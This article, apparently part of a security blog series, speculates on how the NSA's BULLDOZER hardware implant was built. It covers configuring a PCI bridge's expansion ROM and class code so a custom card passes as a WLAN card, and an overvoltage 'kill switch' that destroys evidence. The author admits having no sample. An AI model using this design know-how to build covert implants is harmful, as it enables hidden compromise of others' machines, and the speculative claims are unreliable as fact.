PCI class code for the BULLDOZER hardware that contains GINSU probably is not a PCI mass storage controller like the one used by DEITYBOUNCE. Instead, the BULLDOZER PCI chip very possibly uses a PCI wireless controller class code. The second component is named BULLDOZER. This codename perhaps refers to the capability of BULLDOZER to push large quantities of materials to their intended place, which in the context of GINSU provides the capability to push the final payload (KONGUR) to the target systems. In this particular malware context, BULLDOZER refers to the PCI add-in card (hardware) implant installed in the target machine. BULLDOZER is a custom PCI add-in card. It very probably masquerades as a PCI WLAN add-in card because it provides a wireless communication function that requires a certain kind of antenna. However, this doesn’t prevent BULLDOZER from masquerading as another kind of PCI add-in card, but the presence of a physically larger antenna in the PCI WLAN card could boost the wireless signal strength. Therefore, the NSA might use the PCI WLAN card form factor to their advantage. We will look deeper into BULLDOZER implementation later. The third (last) component is named KONGUR. KONGUR is a bit mysterious name. It may refer to Kongur Tagh Mountain in China’s Xinjiang-Uyghur Autonomous Region. This could possibly means that the GINSU-BULLDOZER combo was devised for a campaign to infiltrate Chinese computer systems. After all, the Xinjiang-Uyghur Autonomous Region is famous for its people’s rebellion against the Chinese central government. This doesn’t mean that the GINSU-BULLDOZER combo wasn’t used against other targets in other campaigns though. KONGUR is a Windows malware that targets Windows 9x, 2000, XP, Server 2003 and Vista. GINSU provides the delivery and reinstallation mechanism for KONGUR. We can view KONGUR as the payload of the GINSU-BULLDOZER combo. It’s possible that KONGUR could also work in Windows Vista derivatives, such as Windows 7 and Windows Server 2008, or even later Microsoft operating system (OS), such as Windows 8, Server 2012, and 8.1 because KONGUR also targets Windows Vista, and we don’t know which 0-day exploit it uses and whether the 0-day exploit has already been patched or not. This article doesn’t delve deep into KONGUR and GINSU; the focus is on its hardware delivery mechanism, the BULLDOZER malware. The GINSU-BULLDOZER malware combo is the second NSA BIOS malware that we looked into that “abuses” the PCI expansion ROM—after DEITYBOUNCE. Well, we could say that the NSA is quite fond of this technique. Though, as you will see later, it’s a justified fondness. Anyway, this hypothesis on the GINSU-BULDOZER combo is bound to have subtle inaccuracies because I have no sample of the malware combo to back-up my assertions. I’m very open to constructive criticism in this regard. Now, we are going to look into BULLDOZER technical details. However, if you’re not yet familiar with the PCI bus protocol, please read the first part of this series (NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). There are links in that article that further break down the required prerequisite knowledge, just in case you’re not up to speed yet. BULLDOZER: NSA Malicious PCI Add-In Card In this section we delve into details of the procedures that the NSA probably carries out to create the BULLDOZER hardware implant. Surely, the exact type of hardware used by the NSA may very well be different. However, I try to draw the closest analogy possible from the public domain knowledge base. Despite the NSA’s superiority compared to the private sectors, all of us are bound to the laws of physics and must adhere to hardware protocol in the target systems. Therefore, the NSA’s approach to build BULLDOZER couldn’t be that much different than the explanation in this article. In the BULLDOZER Implementation Recap section, I try to draw the most logical hypotheses on the BULLDOZER hardware implant, based on the explanation of the process in designing and creating a PCI add-in card similar to BULLDOZER. PCI add-in cards are installed on PCI expansion slots on the motherboard. Figure 2 shows a PCI add-in card sample. This PCI add-in card is a PCI WLAN card. Figure 2 highlights the PCI “controller” chip from Ralink—a WLAN controller—and the PCI slot connector in the add-in card. The term “controller” is a generic name given to a chip that implements the core function in a PCI add-in card. PCI hardware development documentation typically uses this term, as do PCI-related specifications. Figure 2 PCI add-in card sample. Courtesy: D-Link. I use a PCI WLAN card as an example because the GINSU extended concept of operation implies that the BULLDOZER hardware implant is a PCI wireless controller card. As to what kind of wireless protocol it uses, we don’t know. But, the point is, BULLDOZER could masquerade as a PCI WLAN card for maximum stealth. It would look innocuous that way. Figure 2 doesn’t show the presence of any flash ROM in the PCI add-in card. The PCI add-in card typically stores the PCI option ROM code in the flash ROM. The purpose of Figure 2 is just to show you the typical appearance of the PCI add-in card for wireless communications. We’ll get into the flash ROM stuff later on. PCI Add-In Card in OEM Desktop PC Circa 2008 Now, let’s look at how a typical 2008 desktop PC could be implanted with such a card. One of the desktop PCs from a system builder that still had a PCI slot(s) in 2008 is the Lenovo ThinkCentre M57 Desktop PC. I chose a Lenovo desktop PC as an example because its products were widely used in China—besides other parts of the world. It could probably be one of the victims of the GINSU-BULLDOZER campaign. Who knows? The Lenovo ThinkCentre M57 has two PCI slots. Let’s say NSA “interdicts” such a system. They can install BULLDOZER in it and then replace the user guide as well to make the BULLDOZER implant look like a legitimate PCI add-in card that comes with the PC, just in case the user checks the manual before using the system. Figure 3 Lenovo ThinkCentre M57 PCI Add-In Card Replacement Instructions (edited version of the original ThinkCentre Hardware Maintenance Manual instructions). Courtesy: Lenovo. The Lenovo ThinkCentre Hardware Maintenance Manual even comes with instructions to replace a failed PCI add-in card. Figure 3 shows the instruction to replace a PCI add-in card in an “exploded view” style. Hardware replacement instructions shown in Figure 3 are a pedestrian task to do; any NSA field agent can do that. PCI Wireless Communication Add-In Card Hardware and Software Co-Development Now, let’s look at the steps to develop a PCI wireless communication add-in card in general, because we presume that BULLDOZER falls within this PCI add-in card category. I’m quite sure the NSA also follows the approach explained here, despite being a very advanced spying agency. Only the tools and hardware it uses are probably different—perhaps custom-made. From a cost point of view, using a Commercial Off-The-Shelf (COTS) approach in creating BULLDOZER hardware would be more cost-effective, i.e. using tools already in the market cost much less than custom tools. COTS benefited from economic of scale and competition in the market compared to custom tools. Moreover, from operational standpoint, the GINSU-BULLDOZER target systems would likely evolve after five years, which dictates the use of new tools. Therefore, obsolescence, which usually plagues COTS solutions, is not a problem in the GINSU-BULLDOZER campaign. The latter fact strengthened my suspicion that the NSA very probably uses the COTS approach. We’ll look at this COTS approach shortly. The “crude” steps to develop a PCI add-in card and its assorted software in general—via the COTS approach—are as follows: High-level design. This step involves the high-level decision on what kind of PCI controller chip would be created for the PCI add-in card and what features the chip would implement and what auxiliary support chip(s) are required. For example, in the case of a PCI wireless communication add-in card, typically you will need a separate Digital Signal Processor (DSP) chip, or you need to buy the DSP logic design from a DSP vendor and incorporate that design into your PCI Field Programmable Gate-Array (FPGA). Hardware prototyping. This step involves creating the PCI controller chip prototype with a PCI FPGA development board. Typically, the language used to develop the PCI controller chip in the FPGA is either VHDL or Verilog. This mostly depends on the FPGA vendor. Software (device driver) development. This step involves creating a prototype device driver for the PCI add-in card for the target Operating System (OS). For example, if the device would be marketed for mostly Windows users, then creating a Windows device driver would take priority. As for other target OS, it would be developed later or probably not at all if market demands on the alternative OS don’t justify the cost involved in developing the driver. This step is typically carried-out in parallel to hardware prototyping once the first iteration of the FPGA version of the chip is available. Some FPGA vendors provide a “template” driver for certain target OS to help with the driver development. This way, the PCI controller chip development can run in parallel with the chip design. There are also third-party “driver template” vendors which are endorsed by the FPGA vendors, such as Jungo Windriver—see WinDriver - USB/PCI Device Driver Development Toolkit |. Chip fabrication, also known as the making of the Application Specific Integrated Circuit (ASIC). In this step, the first design revision of the chip is finished and the design is sent to chip fabrication plant for fabrication, such as TSMC, UMC or other contract semiconductor fab. This is an optional step though, because some low-volume PCI add-in cards these days are made out of FPGA anyway. If the cost of chip fabrication doesn’t make economic sense against creating the product out of FPGA, then the final product uses FPGA anyway. Well, the NSA has several semiconductor fabs—for example, see NSA plant in San Antonio shrouded in secrecy - Houston Chronicle. One of the NSA’s fab probably was used to fabricate BULLDOZER PCI controller chip. Compatibility test on the PCI hardware-software “combo”. The chip vendor carries out the compatibility testing first. If the target OS is Windows, Microsoft also carries out additional compatibility testing. In the Windows platform, there is this so-called “WHQL” testing. WHQL stands for Windows Hardware Quality Labs. Windows Hardware Quality Labs testing or WHQL Testing is Microsoft’s testing process which involves running a series of tests on third-party hardware or software, and then submitting the log files from these tests to Microsoft for review. In case the primary target OS is not Windows, only the test from the hardware vendor is carried out. The NSA very probably also carries out this kind of test, but for an entirely different purpose, i.e. to make sure the driver works as stealthily as possible or to mislead the user to think the driver is just an ordinary PCI device driver. Steps 2 and 3 are actually iterative steps. The PCI hardware prototype goes through several iterations until it matures and is ready for fabrication. Step 4 could also happen as an iterative step, i.e. there are several revisions of the chip. The first revision might have a flaw or performance weakness that must be improved, despite being a functional design. In the commercial world, ASICs typically have several revisions. Each revision is marked as a “stepping”. You would find the word “stepping” mentioned in many CPU, chipset or System-on-Chip (SoC) technical documentation. “Simulating” BULLDOZER Hardware Now, let’s look into the process of developing a specific PCI add-in card, i.e. a PCI add-in card with wireless communication as its primary function. We focus on this kind of PCI add-in card because BULLDOZER connects to the outside world—to OMNIGAT in Figure 1—via an unspecified wireless connection. For this purpose, we look into the hardware prototyping step in more detail. Let’s start with some important design decisions in order to emulate BULLDOZER capabilities, as follows: The prototype must have the required hardware to develop a custom wireless communication protocol. The reason is because the wireless communication protocol used by BULLDOZER to communicate with OMNIGAT must be as stealthy as possible, despite probably using the same physical antenna as a PCI WLAN card. The prototype must have an implemented PCI expansion ROM hardware. The reason is because GINSU is a malicious PCI expansion ROM code that must be stored in a functional PCI expansion ROM chip to work. GINSU is configurable, or at the very least it can be optionally triggered—based on the NSA ANT server document. This means there must be some sort of non-volatile memory in the prototype to store GINSU parameters. It could be in the form of a Non-Volatile RAM (NVRAM) chip, like in the DEITYBOUNCE case. Storing the configuration data in a flash ROM or other kinds of ROM is quite unlikely, given the nature of flash ROM which requires a rather complicated procedure to rewrite. The next step is to choose the prototyping kit for the hardware. There are many PCI FPGA prototyping board in the market. We will look into one of them from Sundance (DSP and FPGA Solutions - Sundance Multiprocessor Technology Ltd.). Sundance is probably a very obscure vendor to you. However, this vendor is one of the vendors that provide a PCI development board for a Software-Defined Radio (SDR) application. You might be asking, why would I pick a PCI SDR development board as an example? The reason is simple, because SDR is the best approach when you want to develop your own wireless protocol. You can tune the frequency, the type of modulation, transmitter power profile, and other parameters needed to make the protocol as stealthy as possible. BULLDOZER Hardware “Simulation” with Sundance SMT8096 SDR Development Kit There are usually more than one FPGA in a typical PCI SDR development board. We are going to look into one of Sundance products which were available in the market before 2008—the year the GINSU-BULLDOZER malware combo was operational. I picked Sundance SMT8096 SDR development kit as the example in this article. This kit was available in the market circa 2005. The kit consists of several connected boards with a “PCI carrier” board acting as the host of all of the connected boards. The PCI carrier board connects the entire kit to the PCI slot in the development PC. Figure 4 shows the entire Sundance SMT8096 SDR development kit hardware. Figure 4 Sundance SMT8096 SDR development kit. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 4 shows the components of the Sundance SMT8096 SDR development kit. As you can see, the development kit consists of several circuit boards as follows: SMT395-VP30 board, which contains the Texas Instrument TI DSP C6416T chip and the Xilinx Virtex II Pro FPGA. The TI DSP C6416T chip provides the primary signal processing in the development kit, while the Virtex II FPGA provides the reconfigurable signal processing part. Actually, it’s the FPGA in this board that provides the term “software” in the “software-defined” part of the SDR abbreviation. The SMT350 board provides the Analog-to-Digital Converter (ADC) / Digital-to-Analog Converter (DAC) functions. This board provides two functions. First, it receives the analog input from the input antenna and then converts that input into its equivalent digital representation before feeding the result to the signal processing board. Second, it receives the digital output of the signal processing board and converts that digital signal into an analog signal to be fed into the output antenna. The input and output antenna could be the same or different, depending on the overall design of the SDR solution. The SMT368 board provides yet another FPGA, a Xilinx Virtex 4 SX35 FPGA. This board provides “protocol/data-format” conversion function as you can see in Figure 5 (Sundance SMT8096 SDR development kit block diagram). SMT310Q is the PCI carrier board. It’s this board that connects to the host (desktop PC) motherboard via the PCI connector. This board provides the PCI logical and physical interface into the host PC. Figure 5 shows the block diagram of the entire SDR development kit. It helps to understand interactions between the SDR development kit components. Figure 5 Sundance SMT8096 Development Kit Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Let’s look into SMT310Q PCI carrier board, because this board is the visible one from the motherboard BIOS perspective. We’ll focus on the technology required to communicate with the host PC instead of the technology required for the wireless communication, because we have no further clues on the latter. Moreover, I’m not an expert in radio communication technology in anyway. The SMT310Q PCI carrier board has a QuickLogic V363EPC PCI bridge chip, which conforms to PCI 2.1 specifications. This chip was developed by V3 Semiconductor, before the company was bought by QuickLogic. The V363EPC PCI Bridge connects the devices on the SMT8096 development kit to the host PC motherboard—both logically and electrically—via the PCI slot connector. This PCI bridge chip is not a PCI-to-PCI bridge, rather it’s a bridge between the custom bus used in the SMT8096 development kit and the PCI bus in the host PC. The correct term is Local Bus to PCI Bridge. Local bus in this context refers to the custom bus in the SMT8096 development kit—used for communication between the chips in the development kit boards. At this point we have made the important design decisions, we have picked the PCI hardware development kit to work with, and we have looked into the PCI-specific chip in the development kit. It’s time to get into details of the design implementation. The steps to implement the design are as follows: Assuming the wireless communication protocol has been defined thoroughly, the first step is to implement the protocol in the form of DSP chip firmware code and FPGA designs. The DSP chip firmware code consists of initialization code required to initialize the DSP chip itself, code to initialize the interconnection between the DSP chip and the Local Bus to PCI Bridge via the Local Bus interface, and code for other auxiliary functions. Assuming we use the Sundance SMT8096 kit, this step consists of creating the firmware code for the Texas Instrument TIC6416T DSP chip and creating the FPGA designs for the Xilinx Virtex-II and Xilinx Virtex-4 SX35. We are not going to delve into the details of this step, as we don’t know the specifics of the wireless communication protocol. The second step is to customize the hardware to support the PCI expansion ROM. This is required because we assume the GINSU malware is a malicious PCI expansion ROM code. In this step we configure the SMT310Q carrier board to support the PCI expansion ROM because this board is the one that interfaces with the host (x86/x64 desktop) PCI bus, both at the logical and physical level. We have to enable the Expansion ROM Base Address Register (XROMBAR) in the QuickLogic V363EPC PCI bridge chip (Local Bus to PCI Bridge) in the SMT310Q carrier board via hardware configuration, and we have to provide a flash ROM chip to store the PCI expansion ROM code on the board as well. If you’re not familiar with XROMBAR, refer to my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) for the details. Now, let’s focus on the last step: customizing the hardware required for the PCI expansion ROM to work. It’s the SMT310Q carrier board that implements the PCI bus protocol support in SMT8096 PCI SDR development kit. Therefore, we are going to scrutinize the SMT310Q carrier board to find out how we can implement the PCI expansion ROM on it. We start with the board block diagram. Figure 6 shows the SMT310Q block diagram. The block diagram is not a physical block diagram of the board. Instead, it’s a logical block diagram depicting logical interconnections between the board components. Figure 6 SMT310Q Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 6 shows blocks marked as TIM, i.e. TIM 1, TIM 2 and so on. TIM is an abbreviation for Texas Instrument Modules. TIM is a standard interconnection between boards using a Texas Instrument DSP chip and other board(s). I couldn’t find the latest version of TIM specifications. However, you can find TIM version 1.01 on the net. Despite that TIM implies that a DSP that should be connected via this interconnect, in reality, anything that conforms to the specifications can be connected. It’s important to know about TIM, because we are going to use it to “wire” the PCI expansion ROM and also to “wire” NVRAM into the SMT310Q carrier board later. Figure 6 shows that the QuickLogic V363EPC PCI bridge—marked as V3 PCI Bridge—connects to the TIMs via the 32-bit Global Bus. The 32-bit Global Bus corresponds to the LAD[31:0] multiplexed address and data lines in the QuickLogic V363EPC datasheet. This means the logical and physical connection from QuickLogic V363EPC to the PCI expansion ROM and the NVRAM in our design will be based on the Global Bus. Now, let’s look at how QuickLogic V363EPC exposes devices wired to the TIMs into the host x86/x64 CPU address space. QuickLogic V363EPC uses the so-called “data transfer apertures” to map devices connected through LAD[31:0] into the host x86/x64 CPU address space. These apertures are basically an address range claimed by the PCI Base Address Registers (BARs) in QuickLogic V363EPC. QuickLogic V363EPC datasheet uses different naming scheme for PCI BARs. Figure 7 shows the PCI BARs marked as PCI_BASEx registers. The PCI_MAPx registers in Figure 7 control the amount of memory or I/O range claimed by the PCI_BASEx registers. If you are new to PCI configuration space registers, my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) has a deeper explanation on the subject. You can compare the “standard” PCI configuration space registers explained there and the ones shown in Figure 7. Figure 7 QuickLogic V363EPC PCI configuration registers. Courtesy: QuickLogic V363EPC datasheet. Let’s look deeper into the “data transfer aperture” in QuickLogic V363EPC. The “aperture” is basically address remapping logic, i.e. it remaps addresses from the host x86/x64 CPU address space into the local address space in the SMT310Q PCI add-in board. If you’re new to address remapping, you can read a sample of the concept in System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute. Figure 8 shows simplified block diagram of the QuickLogic V363EPC aperture logic (address remapper). Figure 8 QuickLogic V363EPC Aperture Logic Figure 8 shows QuickLogic V363EPC claims two different ranges in the PCI address space of the host x86/x64 CPU address space. We are only going to delve into the first range claimed by the PCI_BASE0 register. This is the relevant excerpt from QuickLogic V363EPC datasheet: “4.1.8 Special Function Modes for PCI-to-Local Bus Apertures PCI-to-Local bus aperture 0 shares some functionality with the expansion ROM base aperture. The address decoder for PCI-to-Local aperture 0 is shared with the expansion ROM base register. When the expansion ROM base is enabled, the decoder will only bridge accesses within the ROM window. When the ROM is disabled, PCI-to-Local bus aperture 0 will function as described above. Typically, the expansion ROM is used only during BIOS boot, if at all. The expansion ROM base register can be completely disabled via software.” The excerpt above clarifies the PCI expansion ROM mapping. Basically, it says that when the PCI expansion ROM chip mapping is enabled via the XROMBAR register, the aperture will be used only for access to the PCI expansion ROM chip. No other chip can claim the transaction via the aperture. XROMBAR in QuickLogic V363EPC chip must be enabled in order to support PCI expansion ROM. This is quite a complicated task. We must find the default XROMBAR register value in the chip. The XROMBAR is named PCI_ROM register in QuickLogic V363EPC datasheet, as you can see in Figure 7. QuickLogic V363EPC datasheet mentions that PCI_ROM (XROMBAR) default value upon power-on is 00h. This means the XROMBAR is disabled because its least significant bit is zero—per PCI specification. However, this is not a problem as the default values of the PCI configuration space registers in QuickLogic V363EPC PCI bridge can be made configurable. There are hardware “straps” that control the default values of the PCI configuration space registers in QuickLogic V363EPC. One of the “straps’” configuration instructs QuickLogic V363EPC to “download” its PCI configuration space registers default values from an external serial EEPROM chip. Pay attention to the fact that this serial EEPROM chip is an entirely different chip from the PCI expansion ROM chip. Figure 9 shows the “straps” option for V363EPC PCI configuration space registers. Figure 9 QuickLogic V363EPC PCI Configuration Space Registers Default Values Initialization “straps” Option. Courtesy: QuickLogic V363EPC datasheet. Figure 9 shows there are two “straps” that control the default value initialization in V363EPC, i.e. SDA and SCL. Both of these “straps” are actually pins on the V363EPC chip. As you can see, when SDA and SCL are connected to serial EEPROM, the PCI configuration space registers default values will be initialized from serial EEPROM. The SDA and SCL pins adhere to I2C protocol. I2C is a serial protocol to connect microcontroller and other peripheral chips in a cost efficient manner, i.e. in as small a number of pins as possible, because pins and traces on a circuit board are costly to design and manufacture. SDA stands for Serial Data and SCL stands for Serial Clock, respectively. Figure 10 V363EPC to serial EEPROM connection circuit schematic. Courtesy: QuickLogic V363EPC datasheet. Figure 10 shows the circuit schematic to implement loading default PCI configuration space registers from EEPROM. Now we know how to “force” V3636EPC PCI configuration space registers default values to our liking. Once the pull-up resistors are set up to configure QuickLogic V363EPC to use serial EEPROM, the QuickLogic V363EPC PCI configuration space registers default values are stored in serial EEPROM and automatically loaded to QuickLogic V363EPC PCI configuration space after power-on or PCI bus reset, prior to PCI bus initialization by the motherboard BIOS. This means we can configure the XROMBAR default value via contents of the serial EEPROM. Therefore, the PCI_ROM (XROMBAR) can be enabled. Another PCI configuration register to take into account is the PCI_MAP0 register. The PCI_MAP0 register—highlighted in red box in Figure 7—controls whether the PCI_ROM register is enabled or not. It also controls size of the ROM chip to be exposed through the PCI_ROM register. Let’s look into details of the PCI_MAP0 register. Figure 11 shows the relevant excerpt for PCI_MAP0 register from QuickLogic V363EPC datasheet. Figure 11 PCI_MAP0 register description. Courtesy: QuickLogic V363EPC datasheet Figure 11 shows the ROM_SIZE bits in PCI_MAP0 register highlighted in yellow. The bits determine size of the PCI expansion ROM to be decoded by QuickLogic V363EPC. As you can see, the chip supports a PCI expansion ROM with size up to 64KB. Perhaps this size is not up to what a malicious PCI expansion ROM payload requires. However, a malicious PCI expansion ROM code can load additional code from other memory storage in the PCI add-in card when the ROM code executes. You must configure the ROM_SIZE bits default value to the correct value according to your hardware design. Entries in Figure 11 that have their “type” column marked as FRW means the default value of the bits are determined by the contents of the serial EEPROM if serial EEPROM support is activated via SDA and SCL “straps”. Therefore, all you need to do is place the correct value in the serial EEPROM to configure their default values. There is one more PCI configuration space register to take into account to implement BULLDOZER hardware, the Class Code register. The PCI Class Code register consists of three sub-parts: the base class, sub-class and interface. Figure 12 shows the class code selections for PCI Wireless Controller class of devices. Figure 12 PCI Wireless Controller Class Code As you see in Figure 12, we have to set the class code in our BULLDOZER chip design to base class 0Dh, sub-class 21h and interface 00h to make it masquerade as a PCI WLAN chipset that conforms to WLAN protocol revision B. Figure 7 shows the location of the Class Code register in the QuickLogic V363EPC chip. All you need to do is to store the correct class code in the serial EEPROM used to initialize contents of QuickLogic V363EPC PCI configuration space registers. This way our BULLDOZER design conforms to the PCI specification nicely. At this point we can control the QuickLogic V363EPC PCI configuration space register’s default values. We also have gained the required knowledge to map a PCI expansion ROM chip into the host x86/x64 CPU address space. The thing that’s left to design is the way to store the BULLDOZER configuration. Let’s assume that we design the BULLDOZER configuration in an NVRAM chip. We can connect the NVRAM chip to SMT310Q PCI carrier board via the TIM interface, just like the PCI expansion ROM chip. The process to design the interconnection is similar to what we have done for the PCI expansion ROM chip. Except that we must expose the chip to code running on the host x86/x64 CPU via different aperture, for example by using PCI-to-Local Aperture 1. Now, we know everything we need to implement a BULLDOZER hardware. There is one more thing left though, the “kill switch”, i.e. the hardware to “destroy” evidence, just in case an operation involving BULLDOZER hardware gets botched. Implementing “Kill Switch”: Military-Grade Electronics Speculation It’s a standard procedure to have a kill switch in military electronics. A kill switch is a mechanism that enables you to destroy hardware or software remotely, that renders the hardware or software beyond repair. The destruction must be sufficient to prevent the software or hardware from being analyzed by anyone. There are several reasons to have a kill switch. First, you don’t want an adversary to find evidence to implicate you in the event that an operation fails. Second, you don’t want your adversary to know your highly valued technology. There are other strategic reasons to have a kill switch, but those two suffice to conduct research into implementing a kill switch in BULLDOZER. BULLLDOZER is a hardware that consists of several electronic chips “bounded” together via circuit board. Therefore, what we need to know is the technique to destroy the key chips in a circuit board at moment’s notice. Surely, we turn to physics to solve this problem. From my experience as an overclocker in the past, I know very well that you can physically destroy a chip by inducing electromigration on it. From Wikipedia: Electromigration is the transport of material caused by the gradual movement of the ions in a conductor due to the momentum transfer between conducting electrons and diffusing metal atoms. Electromigration in simple terms means: the breakdown of metal interconnect inside a semiconductor chip due to migration of metal ions that construct the metal interconnect to an unwanted location. To put it simply, electromigration causes the metal interconnect inside the chip to be destroyed, akin to—but different from—corrosion in metal subjected to harsh environment. In many cases, electromigration can cause unwanted short circuits inside the chip. Figure 13 shows an electromigration illustration. As you can see, the copper ion (Cu+) moves in the opposite direction from the electrons. The copper ion is previously a part of the copper interconnect inside the semiconductor chip. The copper ion “migrates” to a different part of the chip due to electromigration. Figure 13 Electromigration. Courtesy: Wikipedia There are many ways to induce electromigration on a semiconductor chip. However, I would focus only on one of them: overvoltage. You can induce electromigration by feeding excess voltage into a chip or into certain parts of a chip. The problem now is designing a circuit to overvoltage only a certain part of a semiconductor chip. Let’s assume that we don’t want to overvoltage the entire chip, because we have previously assumed that BULLDOZER masquerades as a PCI WLAN chip. Therefore, you only want to destroy the part that implements the custom stealthy wireless communication protocol, not the part that implements the WLAN protocol. If the WLAN function was suddenly destroyed, you would raise suspicion on the target. One of the way to create large voltage inside an electronic circuit is by using the so-called “charge pump”. A charge pump is a DC to DC converter that uses capacitors as energy storage elements to create either a higher or lower voltage power source. As far as I know, it’s quite trivial to implement a capacitor in a semiconductor chip. Therefore, using a charge pump to create our required overvoltage source should be achievable. Figure 14 shows one of the charge pump designs. Figure 14 Dickson Charge Pump Design with MOSFETs. Courtesy: Wikipedia Vin in Figure 14 is the source voltage that’s going to be “multiplied”. Vo in Figure 14 is the output voltage, i.e. a multiplication of the input voltage. As you can see, we can create voltage several times higher than the source voltage inside a semiconductor chip by using a charge pump. I have used a charge pump in one of my projects in the past. It’s made of discrete electronics parts. The output voltage is usually not an exact multiple of the input voltage due to losses in the “multiplier” circuit. I suspect that a charge pump design implemented inside a semiconductor chip provides better “voltage multiplication” function compared to discrete ones. At this point, we have all the things needed to create a kill switch. Your circuit design only needs to incorporate the charge pump into the design. You can use the control register in an FPGA to feed the logic on whether to activate the charge pump or not. You can devise certain byte patterns to turn on the charge pump to destroy your prized malicious logic parts in the PCI add-in card. There are surely many ways to implement a kill switch. Using a charge pump is only one of the many. I present it here merely out of my “intuition” to solve the problem of creating a kill switch. The military surely has more tricks up their sleeve. BULLDOZER Implementation Recap We have gathered all the techniques needed to build a “BULLDOZER-equivalent” hardware in the previous sections. Surely, this is based on our earlier assumption that BULLDOZER masquerades as a PCI WLAN add-in card. Now, let’s compose a recap, building on those newly acquired techniques and our assumptions in the beginning of this article. The recap is as follows: BULLDOZER is a malicious PCI add-in card that masquerades as a PCI WLAN card. It implements the correct PCI class code to masquerade as a PCI WLAN card. BULLDOZER implements a PCI expansion ROM because it’s the delivery mechanism to “inject” GINSU malware code into the x86/x64 host system. BULLDOZER uses SDR to implement a stealthy wireless communication protocol to communicate with OMNIGAT. BULLDOZER was designed by using SDR FPGA prototyping tools before being fabricated as ASIC in the NSA’s semiconductor fab. The NSA could use either Altera, Xilinx or internally-developed FPGA prototyping tools. BULLDOZER exposes the PCI expansion ROM chip via the XROMBAR in its PCI configuration space. The size of PCI expansion ROM chip exposed through XROMBAR is limited to 16MB, per the PCI specification. However, one can devise “custom” code to download additional content from the BULLDOZER PCI add-in card to system RAM as needed during the PCI expansion ROM execution. 16MB is already a large space for malicious firmware-level code though. It’s not yet clear whether one desktop PC implanted with BULLDOZER is enough or more is required to make it work. However, the GINSU extended concept of operation implies that one BULLDOZER-implanted desktop PC is enough. A possibility not covered in this article is the NSA licensed design for the non-stealthy PCI WLAN controller chip part of BULLDOZER from commercial vendors such as Broadcom or Ralink. This could shorten the BULLDOZER design and implementation timeframe by quite a lot. Another possibility not covered here is BULLDOZER PCI chip being a multifunctioning PCI chip. The PCI bus protocol supports a single physical PCI controller chip that contains multiple functions. We don’t delve into that possibility here though. As for the chip marking for the BULLDOZER PCI WLAN controller chip, it could easily carried out by the NSA fab. Well, with the right tool, anyone can even print the “I Love You” phrase as a legitimate-looking chip marking, like the one shown in Andrew “Bunnie” Huang blog: Qué romántico! « bunnie's blog. That is all for our BULLDOZER implementation recap. It’s quite a long journey, but we now have a clearer picture on BULLDOZER hardware implementation. Closing Thoughts: BULLDOZER Evolution Given that BULLDOZER was fielded almost six years ago, the present day BULLDOZER cranking out of the NSA’s fab must have evolved. Perhaps into a PCI Express add-in card. It’s quite trivial to migrate the BULLDOZER design explained in this article into PCI Express (PCIe) though. Therefore, the NSA shouldn’t have any difficulty to carry out the protocol conversion. PCIe is compatible to PCI in the logical level of the protocol. Therefore, most of the non-physical design can be carried over from the PCI version of BULLDOZER design explained here. We should look into the “evolved” BULLDOZER in the future.